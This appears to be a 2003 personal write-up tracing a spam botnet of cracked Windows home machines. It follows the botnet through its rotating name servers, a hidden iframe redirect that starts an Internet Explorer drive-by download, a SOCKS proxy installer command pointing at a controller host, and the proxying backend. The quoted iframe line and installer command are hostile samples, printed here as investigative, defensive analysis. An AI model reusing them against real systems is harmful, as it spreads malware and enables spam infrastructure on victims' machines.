Tracing distributed spam attacks
The story continues
October 15, 2003
A couple of weeks ago, we started to receive a steady stream of bounced spam. Someone was sending large amounts of spam, using forged random mail addresses from our domain as the sender address. Of course, many of the bounces ended up at our mail server.
The stream of bounces, about one every 10 seconds, wasn't large enough to pose any real problems, but it was still mildly irritating. I decided to take a stab at tracing the spammers. I took a sample of the bounces and found that the spam advertised the shady pharmacy site drugstorepharmacy.biz and originated from machines all around the world, from Venezuela to China, typically connected via ADSL. Some of them were still reachable, and nmap detected all of them as "Windows Millennium Edition (Me), Win 2000, or WinXP". Typical broadband connected home or SOHO boxen in other words, obviously cracked. This was getting interesting.
I have by now observed cracked machines in large parts of the world, including Sweden and other Nordic countries.
Now, if you check the A records for drugstorepharmacy.biz, you find that the site is served by the same kind of compromised windows machines. Not only is the spam sent from obscure home machines, for which you have little or no chance of reaching the owner, but the actual spamvertised websites are served by the same machines. This is bad news for a spam fighter.
But it gets even better...
Check the name server records for drugstorepharmacy.biz. The name services are provided by ns[1-5].bubra.biz, which point to - yes, you guessed it - the same kind of cracked windows machines. The compromised machines also get turned into name servers.
The IP addresses for the bubra.biz name servers are constantly changing. Presumably the machines used as name servers are discovered and disinfected from time to time, and so the name server information is updated from a pool of available cracked machines.
I started out on an everyday spam hunt, but ended up discovering a distributed network of cracked windows boxen, providing a complete spamming platform. The whole suite of necessary services are run from the machines of unsuspecting home users, and as soon as you pull the plug on one, the spammers probably can bring five more on-line.
So, are these guys untouchable? Not quite, as it turns out.
All these cracked windows machines seemed to run a web server on port 80, claiming to be an Apache, and serving a non-descript porn page as the default page. Checking back a few days later, the page was gone. Possibly the network had gone into a nonspreading mode.
Anyway, I checked the page source for clues, and found a suspicious looking line:
<iframe src=/cgi-bin/sc5.pl width="1" height="1">
It turned out this CGI script performed a 302-type redirect to http://vhost01.768men.info:nnnnn, with nnnnn being a varying high port number, like 11076.
At that time, vhost01.768men.info resolved to 220.127.116.11, which seems to be a Linux machine at hosthype.com, seemingly a respectable hosting company, at least at a cursory glance.
The high port number seemed to vary in a time dependent manner, but if I connected to it quickly enough, I found what claimed to be an Apache web server, serving an exe-file (link is obfuscated) MIME declared as text/css. Now, this is an obvious attack, targetting the Internet Explorer vulnerabilities addressed in Microsoft bulletins MS01-058 and MS02-023. Anyone accessing one of the cracked machines with a vulnerable version of Internet Explorer would automatically download and execute the exe-file. Ouch.
I got help from more Windows-savvy people to analyse the 4095 byte exe-file. It contained interesting references to the IP address 18.104.22.168. This address has broken reverse DNS; its PTR record points to ".", but it belongs to fdcservers.net, which also looks like a respectable hosting company, based in Chicago.
Looking that machine over, I found that if I made a TCP connection to port 5555, I got a 99 kB exe-file thrown at me.
This new exe-file turned out to be a UPX-compressed RAR archive, containing the three files Msm.exe, regsocks5.exe and ssocks5.dll, plus a trigger to run the installation command "regsocks5.exe 1025-65535 120 120 55124 sock2.ucp6.biz".
These files seem to install and configure MS Proxy Server, which, of course, can be used to send spam.
So, summing all this up, it would seem that if you visit that porn page on one of the cracked windows boxes, using a vulnerable version of Internet Explorer, your machine will be turned into a spam spreading proxy server, just like the machine you visited. You have been assimilated.
That hostname that turns up in the installation command, sock2.ucp6.biz, is another machine at fdcservers.net, with the same broken reverse DNS. And whaddayaknow, if you connect to port 80 on sock2.ucp6.biz and speak a bit of HTTP to it:
GET / HTTP/1.1 Host: drugstorepharmacy.biz
you get the home page for drugstorepharmacy.biz, the site that was spamvertised in the first place. A-ha! It seems we really were on the right track.
So, presumably the cracked machines weren't actually serving the website, they were only proxying incoming connections to sock2.ucp6.biz.
Incidentally, if you send a DNS query for drugstorepharmacy.biz to sock2.ucp6.biz, it admits to have authoritative information for that domain (the aa flag is set in the reply), so it seems likely that DNS queries sent to a cracked machine are forwarded to sock2.ucp6.biz.
This is as far as I can go; I would need customer records from fdcservers.net and hosthype.com to trace the spammers any further. This is where the appropriate law enforcement agencies should take over.
By now, I have e-mailed CERT, and only got an autoreply back. I have tried to get the attention of FBI via their tip page. I have called the Swedish national IT crime squad. They didn't call back.
Meanwhile, the spamming continues.
October 27, 2003
I got published on Slashdot. Suddenly it took quite a while longer to open my mailbox than it usually does...
Thanks, all; I've got a number of interesting contacts now. And today I even got a reply from FBI, your basic boilerplate saying approximately "We're aware of the issue, thankyouverymuch, donotreplytothisaddress." Whee.
A couple of days after my initial investigations, the bubra.biz network seemed to go into a non-contagious mode. The IE-targeting porn page was no longer served from the infected windows machines. Then the machines at hosthype and fdcservers went away.
As I'm writing this, the bubra.biz network seems to have been largely abandoned. The nameserver records are still being updated, but fewer and fewer of the hosts being pointed to seem to be working.
Instead, the operations seem to have moved to grass-smokers.biz, which is an identical network of cracked windows machines, except that they are obviously proxying connections somewhere else (since the original server at fdcservers is down).
I'm now keeping an automated log of the machines that are or have been a part of the bubra/grass-smokers networks.